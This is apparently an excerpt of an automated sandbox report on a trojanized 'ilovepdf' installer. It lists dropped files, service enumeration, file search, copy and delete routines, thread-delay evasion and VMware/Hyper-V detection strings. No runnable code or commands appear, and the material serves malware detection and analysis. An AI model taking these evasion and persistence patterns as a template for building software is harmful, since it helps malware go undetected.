Source: C:\Windows\System32\svchost.exe TID: 6684Thread sleep count: 717 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6684Thread sleep time: -71700s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6668Thread sleep count: 1082 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6668Thread sleep time: -14400000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,13_2_04EC5C60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle,13_2_04ECB9A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,LocalFree,CloseServiceHandle,13_2_04EC2F70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,Sleep,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle,13_2_04ECB800
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,14_2_0000024B7D0EEE50
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,14_2_0000024B7D0E6010
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,14_2_0000024B7D0EEC00
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,16_2_0000012E17886010
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,16_2_0000012E1788EE50
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,16_2_0000012E1788EC00
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,17_2_00000204F339EC00
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,17_2_00000204F3396010
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,17_2_00000204F339EE50
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 717Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1082Jump to behavior
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338441017_2_00000204F3384410
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB3C3013_2_04EB3C30
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-30MA7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\ti.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-93C0J.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\twlib.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-UKPSI.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-JDQA9.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\tt.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\th.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\unins000.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-CU1EC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmpJump to dropped file
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC4560 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,13_2_04EC4560
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: "@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000.ifo
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}#{6ead3d82-25ec-46bc-b7fd-c1f0df8f5037}
Source: svchost.exe, 00000026.00000002.827434902.0000025C96535000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWe>%SystemRoot%\system32\mswsock.dll<IdleSettings>
Source: svchost.exe, 00000010.00000003.500955879.0000012E19682000.00000004.00000001.sdmpBinary or memory string: VMware, Inc.
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}
Source: svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWMSAFD Irda [IrDA]OleMainThreadWndClass
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmp, svchost.exe, 00000011.00000000.333907246.00000204F304E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000000.341000431.000001D91A429000.00000004.00000001.sdmp, svchost.exe, 00000018.00000000.359760415.000001DC51288000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.533385222.000001AFB9A82000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000026.00000000.409171798.0000025C96594000.00000004.00000001.sdmpBinary or memory string: VMware, Inc.ed
Source: svchost.exe, 0000001E.00000000.383086421.000001BE5C029000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: svchost.exe, 00000015.00000002.812290749.000002F2C5013000.00000004.00000001.sdmpBinary or memory string: Allow inbound TCP port 636 traffic for vmicheartbeat
Source: svchost.exe, 0000001E.00000002.816717606.000001BE5C115000.00000004.00000001.sdmpBinary or memory string: nonic\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}DeviceArrivalPU
Source: svchost.exe, 0000001E.00000002.807078645.000000220DAFA000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000001e9-90ce-806e6f6e6963}\
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
Source: svchost.exe, 0000001E.00000000.383086421.000001BE5C029000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 0000000D.00000002.415655644.000000000339A000.00000004.00000020.sdmp, svchost.exe, 0000000E.00000002.812356243.0000024B7CA36000.00000004.00000001.sdmp, svchost.exe, 00000013.00000000.337659687.000002334203F000.00000004.00000001.sdmp, svchost.exe, 00000015.00000000.344287290.000002F2C5029000.00000004.00000001.sdmp, svchost.exe, 00000016.00000000.348368674.00000222CA43F000.00000004.00000001.sdmp, svchost.exe, 00000017.00000002.813571849.0000028621678000.00000004.00000001.sdmp, svchost.exe, 00000019.00000000.364042683.000002216AA5A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.816000256.000002743903C000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000000.376788702.000001111A236000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000000.380313179.0000022F11A29000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.810844808.0000021C22429000.00000004.00000001.sdmp, svchost.exe, 00000022.00000003.572028015.00000202B1ABD000.00000004.00000001.sdmp, svchost.exe, 00000025.00000000.401740945.000001AFB9AA4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000026.00000000.409171798.0000025C96594000.00000004.00000001.sdmpBinary or memory string: VMware7,1L
Source: svchost.exe, 0000001B.00000000.366941643.0000027439029000.00000004.00000001.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
Source: svchost.exe, 0000001E.00000002.815535312.000001BE5C07A000.00000004.00000001.sdmpBinary or memory string: l\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}22\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: svchost.exe, 00000010.00000003.682254804.0000012E19614000.00000004.00000001.sdmpBinary or memory string: (5>OVMware, Inc.VMware Virtual disk 2.0 E4F221468}
Source: svchost.exe, 00000026.00000000.407855374.0000025C95C8A000.00000004.00000001.sdmpBinary or memory string: VMware820ES
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000011.00000000.331175005.00000204F3067000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmpBinary or memory string: (5>OVMware, Inc.VMware Virtual disk 2.0
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{7fccc86c-228a-40ad-8a58-f590af7bfdce}b}}
Source: svchost.exe, 00000026.00000000.407855374.0000025C95C8A000.00000004.00000001.sdmpBinary or memory string: VMware8
Source: svchost.exe, 0000001E.00000002.815535312.000001BE5C07A000.00000004.00000001.sdmpBinary or memory string: AASCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000&00A8
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmpBinary or memory string: VMware
Source: svchost.exe, 00000011.00000000.329876741.00000204EFA29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW}
Source: svchost.exe, 00000010.00000002.812470084.0000012E17623000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,10_2_004AF91C
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0040AEF4 FindFirstFileW,FindClose,10_2_0040AEF4
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,10_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0040E6A0 FindFirstFileW,FindClose,11_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0060BC10 FindFirstFileW,GetLastError,11_2_0060BC10
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_006B76A0 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,11_2_006B76A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB4C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,13_2_04EB4C20
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB56D0 FindFirstFileW,FindClose,13_2_04EB56D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB4E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_04EB4E30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB57F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,13_2_04EB57F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EE97D9 FindFirstFileExA,13_2_04EE97D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB42B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,13_2_04EB42B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB6A30 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,13_2_04EB6A30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB53D0 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,13_2_04EB53D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC7390 lstrcpyW,lstrcatW,lstrcatW,CreateDirectoryW,GetLastError,GetLastError,FindFirstFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,13_2_04EC7390
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D5E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,14_2_0000024B7D0D5E30
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EAE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,14_2_0000024B7D0EAE60
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D57B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_0000024B7D0D57B0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D49FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,14_2_0000024B7D0D49FF
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D7A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,14_2_0000024B7D0D7A20
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D4AE3 FindFirstFileW,FindClose,14_2_0000024B7D0D4AE3
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D63F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,14_2_0000024B7D0D63F0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D110478 FindFirstFileExA,14_2_0000024B7D110478
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D4B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,14_2_0000024B7D0D4B90
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17874AE3 FindFirstFileW,FindClose,16_2_0000012E17874AE3
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178749FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,16_2_0000012E178749FF
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17877A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,16_2_0000012E17877A20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178757B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_0000012E178757B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17875E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,16_2_0000012E17875E30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,16_2_0000012E1788AE60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178B0478 FindFirstFileExA,16_2_0000012E178B0478
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178763F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,16_2_0000012E178763F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17874B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,16_2_0000012E17874B90
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805CF4 FindFirstFileExA,16_2_0000012E19805CF4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19823D90 FindFirstFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,16_2_0000012E19823D90
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198EB2F0 FindFirstFileW,FreeEnvironmentStringsW,GetCommandLineA,16_2_0000012E198EB2F0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,17_2_00000204F3384B90
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33863F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,17_2_00000204F33863F0
